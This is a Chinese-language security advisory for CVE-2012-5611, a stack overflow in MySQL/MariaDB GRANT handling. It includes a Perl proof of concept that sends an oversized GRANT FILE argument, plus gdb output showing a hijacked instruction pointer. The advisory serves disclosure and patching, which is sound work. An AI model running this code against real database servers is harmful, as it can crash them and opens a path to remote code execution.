发布日期:2012-12-01
更新日期:2012-12-05受影响系统:
Oracle MySQL 5.5.19
MariaDB MariaDB 5.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56769
CVE(CAN) ID: CVE-2012-5611Oracle MySQL Server是一个小型关系型数据库管理系统。MySQL 5.5.19、5.1.53及其他版本、MariaDB 5.5.2.x、5.3.x、5.2.x、5.1.x内acl_get()、check_grant_db_routine()函数存在缓冲区溢出漏洞,具有MariaDB (MySQL)服务器低权限的用户可通过GRANT FILE命令的超长参数,造成mysqld崩溃或任意代码执行。<*来源:vendor
链接:http://secunia.com/advisories/51427/
http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0005.html
http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0010.html
https://bugzilla.RedHat.com/show_bug.cgi?id=881064
https://mariadb.atlassian.net/browse/MDEV-3884
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/perl
=for commentMySQL Server exploitable stack based overrun
Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for SUSE-linux-gnu too)
unprivileged user (any account (anonymous account?), post auth)
as illustrated below the instruction pointer is overwritten with 0x41414141
bug found by Kingcope
this will yield a shell as the user "mysql" when properly exploitedmysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core
GNU gdb (GDB) SUSE (7.2-3.3)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i586-suse-linux".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Missing separate debuginfo for the main executable file
Try: zypper install -C "debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803"
[New Thread 8801]
[New Thread 8789]
[New Thread 8793]
[New Thread 8791]
[New Thread 8787]
[New Thread 8790]
[New Thread 8799]
[New Thread 8794]
[New Thread 8792]
[New Thread 8788]
[New Thread 8800]
[New Thread 8786]
[New Thread 8797]
[New Thread 8798]
[New Thread 8785]
[New Thread 8796]
[New Thread 8783]
Core was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log".
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb)
=cut use strict;
use DBI(); # Connect to the database.
my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
"user", "secret",
{"RaiseError" => 1}); $a ="A" x 100000;
my $sth = $dbh->prepare("grant file on $a.* to "user"@"%" identified by "secret";");
$sth->execute();
# Disconnect from the database.
$dbh->disconnect();建议:
--------------------------------------------------------------------------------
厂商补丁:MariaDB
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://mariadb.org/MyBB kingchat插件"username"参数SQL注入漏洞Oracle MySQL Server 5.5.19拒绝服务漏洞相关资讯 MariaDB MariaDB安全漏洞
- Ubuntu 16.04 Dockerfile 安装 (今 10:03)
- MariaDB 10.1.11 发布下载,MySQL (02月04日)
- MariaDB 10.0.23 发布下载 (12/21/2015 20:50:21)
| - CentOS 7.0 使用 yum 安装 MariaDB (03月03日)
- MariaDB 10.1.10 发布下载,MySQL (12/26/2015 10:55:29)
- CentOS 6.6下编译安装MariaDB-10.0 (12/21/2015 19:25:47)
|
本文评论 查看全部评论 (0)
易网时代-编程资源站